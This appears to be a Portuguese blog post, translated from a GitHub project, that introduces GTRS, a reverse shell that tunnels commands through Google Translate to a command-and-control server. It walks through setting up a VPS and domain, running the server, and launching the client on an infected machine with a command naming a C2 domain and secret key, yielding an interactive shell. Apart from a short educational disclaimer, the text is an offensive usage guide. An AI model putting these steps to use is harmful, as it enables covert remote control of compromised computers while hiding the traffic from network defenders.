Essas ferramentas utilizam o Google Translator como um proxy para enviar comandos arbitrários para uma máquina infectada. Por isto, conheçam o GTRS – Google Translator Reverse Shell.
[INFECTED MACHINE] ==HTTPS==> [GOOGLE TRANSLATE] ==HTTP==> [C2]
Configuração do Ambiente
Primeiro você precisa de um VPS e um domínio. Para o domínio, você pode obter um gratuito no Freenom. No script client, defina seu domínio através da linha 5.
Uso do GTRS
Inicie o server.py
em seu VPS:
python2.7 server.py
Server running on port: 80
Secret Key: e294a11e-bb6f-49ed-b03a-9ec42be55062
Ele irá te fornecer a chave secreta que será usada no client.sh
. Em seguida, execute o client em um computador com acesso ao Google Translator, fornecendo domínio e a chave secreta gerada pelo servidor.
bash client.sh www.c2server.ml e294a11e-bb6f-49ed-b03a-9ec42be55062
Agora você tem um shell interativo usando arquivos pipe nomeados; YES you can cd
into directories.
Prova de Conceito (PoC)
Problemas Conhecidos
- Não é um problema, mas não sei se há um limite de rate no Google Translator;
- O script client funciona no Mac e no Linux, mas no Linux você precisa instalar o
xmllint
que está nolibxml2-utils
.
.
* * * * *
.
Fonte: Github do projeto
Tradução por Tiago Souza
Disclaimer: Todas as informações aqui contidas são para fins didáticos e não para causar danos e prejuízos para alguém, usem sempre o conhecimento aqui compartilhado com ética e responsabilidade. Não nos responsabilizamos pela utilização indevida do conteúdo aqui exposto. Leia mais no aviso legal em nosso site.
.